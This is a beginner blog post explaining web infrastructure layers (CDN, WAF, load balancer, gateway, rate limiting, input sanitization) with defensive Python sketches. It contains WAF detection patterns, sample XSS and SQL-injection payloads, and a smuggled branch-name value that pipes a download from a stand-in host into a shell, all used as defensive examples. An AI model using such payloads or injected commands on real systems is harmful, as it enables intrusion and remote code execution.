Kishan Agarwal

Posted on Jun 10 • Originally published at cosmoscribe.hashnode.dev

The Journey of a Request: What Happens Before Your Code Even Runs?

#webdev #systemdesign #architecture #software

Okay, before we go into the depths of these concepts, I want to tell you that we will take it easy. I don’t want you to get overwhelmed by the jargon.

We spend hours arguing about which programming language is the fastest, or how to write the most optimized database query. We debate whether Go is better than Rust, or if Node.js can handle the load.

But have you ever thought about the gauntlet a user's request has to run through before it even touches your beautiful code?

Let's break down the layers of the modern web infrastructure. We have CDNs, WAFs, Load Balancers, API Gateways, Internal Reverse Proxies, Rate Limiting, and Input Sanitization.

Sounds like a massive headache, right? Let's take them one by one.

Content Delivery Network (CDN): The Franchise Model

The formal definition: A CDN is a network of geographically distributed servers that speeds up page loads by serving content from a location close to each user.

Sounds boring. Let me explain it in simple words.

Think of McDonald’s. If McDonald's only cooked burgers in the US, would you wait a month for your food to arrive in India? Of course not. To expand, they open multiple franchises so you can order from the outlet nearest to your house.

A CDN does exactly this for your application data. When you have users from all over the globe, you don't want to serve them from a single server in Virginia. You want to get as close to them as possible. Services like Cloudflare or AWS CloudFront act as your franchises.

When a user requests an image, a video, or even a static HTML file, the CDN fetches it from your main server (the origin) once, caches it, and then serves it directly to anyone else in that region who asks for it, until the cached copy expires.
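To make the "fetch once, serve many" idea concrete, here is a minimal sketch of a single edge location. It is a toy model, not how Cloudflare or CloudFront are implemented: the `EdgeCache` class, the `origin` function, and the 60-second TTL are all made-up names and values for illustration.

```python
import time
from typing import Callable, Dict, Tuple


class EdgeCache:
    """Toy model of one CDN edge location with a time-to-live (TTL) cache."""

    def __init__(
        self,
        fetch_from_origin: Callable[[str], bytes],
        ttl_seconds: float = 60.0,  # assumed value, real TTLs come from cache headers/config
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._fetch = fetch_from_origin
        self._ttl = ttl_seconds
        self._clock = clock
        # path -> (body, expiry timestamp)
        self._store: Dict[str, Tuple[bytes, float]] = {}
        self.origin_hits = 0  # how many times we had to go back to the origin

    def get(self, path: str) -> bytes:
        now = self._clock()
        cached = self._store.get(path)
        if cached is not None and cached[1] > now:
            return cached[0]  # cache hit: the origin is never contacted

        # Cache miss (or expired entry): fetch from the origin and remember it.
        body = self._fetch(path)
        self.origin_hits += 1
        self._store[path] = (body, now + self._ttl)
        return body


def origin(path: str) -> bytes:
    """Hypothetical origin server: pretend this is the slow trip to Virginia."""
    return f"contents of {path}".encode()


edge = EdgeCache(origin, ttl_seconds=60.0)
edge.get("/logo.png")    # first visitor in the region: goes to the origin
edge.get("/logo.png")    # second visitor: served from the edge
print(edge.origin_hits)  # the origin was contacted only once
```

A real CDN also has to decide what is cacheable at all and when to purge stale copies, which this sketch ignores.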

WAF (Web Application Firewall): The Bouncer at the Door

A WAF protects web applications by filtering and monitoring HTTP traffic. It stops attacks like Cross-Site Scripting (XSS) and SQL Injection.

Think of it this way: Do you sleep with your front door wide open? Absolutely not. So why should your application accept every HTTP request that anyone on the internet decides to send it?

A WAF is the bouncer securing those doors. We write specific rules that dictate who the gate will open for and who gets turned away. If a request comes in carrying a malicious payload that looks like a database command, the WAF slams the door in its face before your server even knows someone knocked.
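Here is a rough sketch of what "rules" can look like. The three patterns and the `waf_allows` function are my own simplified assumptions; production WAFs rely on much larger, carefully maintained rule sets, and naive patterns like these are easy to bypass.

```python
import re
from typing import List, Pattern
from urllib.parse import unquote_plus

# Hypothetical block rules. Each one describes a payload shape we refuse to let in.
BLOCK_RULES: List[Pattern[str]] = [
    re.compile(r"<\s*script\b", re.IGNORECASE),             # inline <script> tag (XSS)
    re.compile(r"\bunion\b.+\bselect\b", re.IGNORECASE),    # UNION ... SELECT (SQL injection)
    re.compile(r"('|\")\s*or\s+1\s*=\s*1", re.IGNORECASE),  # ' OR 1=1 (SQL injection)
]


def waf_allows(query_string: str) -> bool:
    """Return True if the request may pass, False if a rule matched."""
    # Decode first, so URL-encoded payloads (%3Cscript%3E) cannot slip past the rules.
    decoded = unquote_plus(query_string)
    return not any(rule.search(decoded) for rule in BLOCK_RULES)


print(waf_allows("q=burgers+near+me"))                     # ordinary search
print(waf_allows("q=%3Cscript%3Ealert(1)%3C/script%3E"))   # encoded script tag
print(waf_allows("id=1%27+OR+1%3D1"))                      # encoded ' OR 1=1
```

The key design point is that the check runs before the request reaches the application, so a blocked request costs your backend nothing.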

Load Balancer: The Traffic Cop

A load balancer acts as a "traffic cop" sitting in front of your servers, distributing incoming client requests across a group of backend servers.

This is exactly what it sounds like. Imagine a busy intersection. If everyone tries to go down the same lane, there will be a massive traffic jam. The load balancer looks at your cluster of 10 servers and says, "Okay, Server 1 is busy sweating over a heavy calculation, let's send this new request to Server 2."

It maximizes speed and ensures high availability. If one server crashes and burns, the traffic cop notices (usually through periodic health checks) and routes traffic to the surviving ones. Most users never notice a thing.
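One common way to pick "the least busy server" is the least-connections strategy. The sketch below is an assumption about how you might model it, with hypothetical `Backend` and `LeastConnectionsBalancer` names; round-robin and weighted strategies are equally valid choices.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Backend:
    name: str
    active_requests: int = 0  # requests currently being handled
    healthy: bool = True      # would be updated by health checks in a real system


class LeastConnectionsBalancer:
    """Send each new request to the healthy backend with the fewest active requests."""

    def __init__(self, backends: List[Backend]) -> None:
        self._backends = backends

    def pick(self) -> Backend:
        candidates = [b for b in self._backends if b.healthy]
        if not candidates:
            raise RuntimeError("no healthy backends available")
        chosen = min(candidates, key=lambda b: b.active_requests)
        chosen.active_requests += 1
        return chosen

    def release(self, backend: Backend) -> None:
        """Call when a request finishes so the backend looks less busy again."""
        backend.active_requests = max(0, backend.active_requests - 1)


servers = [Backend("server-1", active_requests=5), Backend("server-2")]
balancer = LeastConnectionsBalancer(servers)
print(balancer.pick().name)  # server-1 is busy, so server-2 gets the request

servers[1].healthy = False   # server-2 crashes and burns
print(balancer.pick().name)  # traffic falls back to server-1
```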

API Gateway vs. Internal Reverse Proxy: The Watchman and the Guide

If you read my last blog on proxies, you know what a Reverse Proxy is. But wait, if we have an API Gateway, why do we need a reverse proxy? Let's clear the confusion.

The API Gateway (The Watchman): This is the security guard at the main gate of your residential society. They check your ID, verify if you are authorized to be there (Authentication/Authorization), check if you paid your subscription, and make sure you aren't trying to sneak in.

The Internal Reverse Proxy (The Guide): Once the watchman lets you in, you are inside a massive cluster of buildings (microservices). The Load Balancer points to the Reverse Proxy, and the Reverse Proxy looks at your request and says, "Ah, you want user data? Go to building A. You want payment history? Go to building B."
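The split between the two roles can be sketched in a few lines: the gateway decides whether you get in, the reverse proxy decides where you go. Everything named here is hypothetical, including the `X-Api-Key` header, the demo key, and the internal service URLs; real gateways typically validate tokens such as JWTs rather than a hard-coded set.

```python
from typing import Dict, Optional, Tuple

# Hypothetical values, for illustration only.
VALID_API_KEYS = {"demo-key-123"}
ROUTES: Dict[str, str] = {
    "/users": "http://user-service.internal:8080",        # building A
    "/payments": "http://payment-service.internal:8080",  # building B
}


def gateway_authorize(headers: Dict[str, str]) -> bool:
    """The watchman: is this caller allowed through the main gate?"""
    return headers.get("X-Api-Key") in VALID_API_KEYS


def resolve_upstream(path: str) -> Optional[str]:
    """The guide: map a request path to the internal service that owns it."""
    # Check longer prefixes first so the most specific route wins.
    for prefix in sorted(ROUTES, key=len, reverse=True):
        if path == prefix or path.startswith(prefix + "/"):
            return ROUTES[prefix]
    return None


def handle(path: str, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Return (HTTP status, upstream URL) for a request."""
    if not gateway_authorize(headers):
        return 401, None  # turned away at the gate
    upstream = resolve_upstream(path)
    if upstream is None:
        return 404, None  # inside the society, but no such building
    return 200, upstream


print(handle("/users/42", {"X-Api-Key": "demo-key-123"}))
print(handle("/payments", {}))
```

Keeping the two steps in separate functions mirrors why they are often separate components: authentication rules and routing tables tend to change for different reasons.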

Rate Limiting: Preventing the Stampede

Rate limiting is a system design technique that restricts the number of requests a user can make to a service within a specific timeframe.

Why do we do this? Because someone out there might try to overwhelm our services by sending 10,000 requests per second. If we don't stop them, our servers will spend all their CPU power serving this one malicious user, while legitimate users wait in an endless queue. This is known as a Denial of Service (DoS) attack.

Rate limiting is our safety valve. "You've had your 100 requests for this minute, buddy. Come back later."

The Real Engineering Part: How do we actually do this? Usually, we just keep a rapid-fire counter in a fast, in-memory database like Redis. Every time a user makes a request, we increment their counter, and the counter resets when the minute is up. If the counter hits 101 within that minute, we return an HTTP 429 (Too Many Requests) error. Simple, but life-saving.
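The counter idea described above is usually called a fixed-window rate limiter. Here is a minimal sketch that uses a plain Python dictionary as a stand-in for Redis, so it runs without any server; with Redis you would typically increment a per-user key and give it an expiry instead. The class and function names are my own, and the limit of 100 per 60 seconds simply mirrors the example in the text.

```python
import time
from typing import Callable, Dict, Tuple


class FixedWindowRateLimiter:
    """Allow at most `limit` requests per user in each fixed time window."""

    def __init__(
        self,
        limit: int = 100,
        window_seconds: int = 60,
        clock: Callable[[], float] = time.time,
    ) -> None:
        self._limit = limit
        self._window = window_seconds
        self._clock = clock
        # user_id -> (window number, requests seen in that window)
        # In-memory stand-in for Redis: this state is lost on restart
        # and is not shared between servers.
        self._state: Dict[str, Tuple[int, int]] = {}

    def allow(self, user_id: str) -> bool:
        window = int(self._clock() // self._window)
        seen_window, count = self._state.get(user_id, (window, 0))
        if seen_window != window:
            count = 0  # a new minute has started, so the counter resets
        count += 1
        self._state[user_id] = (window, count)
        return count <= self._limit


def status_for(limiter: FixedWindowRateLimiter, user_id: str) -> int:
    """HTTP status the service would return for this request."""
    return 200 if limiter.allow(user_id) else 429


limiter = FixedWindowRateLimiter(limit=100, window_seconds=60)
statuses = [status_for(limiter, "alice") for _ in range(101)]
print(statuses.count(200), statuses.count(429))
```

One known weakness of fixed windows is that a user can burst right at the boundary between two windows; sliding-window and token-bucket limiters exist to smooth that out.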

Input Sanitization: The Most Overlooked Lifesaver

Believe me, this is the most overlooked layer, but it is arguably the most critical one.

Users lie. Users will send you malicious scripts pretending to be standard text inputs. If you don't clean (sanitize) that input, your system can be entirely compromised.

Case in point: hackerbotclaw.

What did the bot do? It found repositories with automated workflow files and opened pull requests where the "branch name" was actually a malicious script. Because the workflow didn't sanitize the branch name before echoing it out in the terminal, the shell ran the script right there on GitHub's servers. Just like that, the bot gained control.
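For the branch-name scenario, two habits go a long way: validate the input against an allowlist of characters, and never paste it into a shell command string. The sketch below shows both. The allowed character set and the function names are my assumptions, not an official rule for what a branch name may contain, and the child Python process is just a portable stand-in for `echo`.

```python
import re
import subprocess
import sys

# Assumed allowlist: letters, digits, dot, underscore, slash, and hyphen only.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]{1,100}")


def is_safe_branch_name(name: str) -> bool:
    """Accept only names made entirely of allowlisted characters."""
    # Also reject a leading "-" so the name can never be mistaken for a CLI flag.
    return SAFE_BRANCH.fullmatch(name) is not None and not name.startswith("-")


def echo_branch(name: str) -> str:
    """Print the branch name from a child process without involving a shell."""
    if not is_safe_branch_name(name):
        raise ValueError(f"rejected suspicious branch name: {name!r}")
    # Passing a list (and no shell=True) means the name is a single argument,
    # so characters like $( ) ; | are never interpreted as shell syntax.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", name],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


print(is_safe_branch_name("feature/login-form"))          # an ordinary branch
print(is_safe_branch_name("$(curl evil.example | sh)"))   # a script in disguise
```

Either defense alone would have stopped this particular trick; using both means a mistake in one does not immediately become a compromise.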

Never trust user input. Always sanitize.

What's Next?

This was just a bird's-eye view of the gauntlet. In the upcoming articles, we are going to tear each of these layers apart. We will look at the code, write our own rate limiters, and configure our own load balancers.

Happy Exploration!
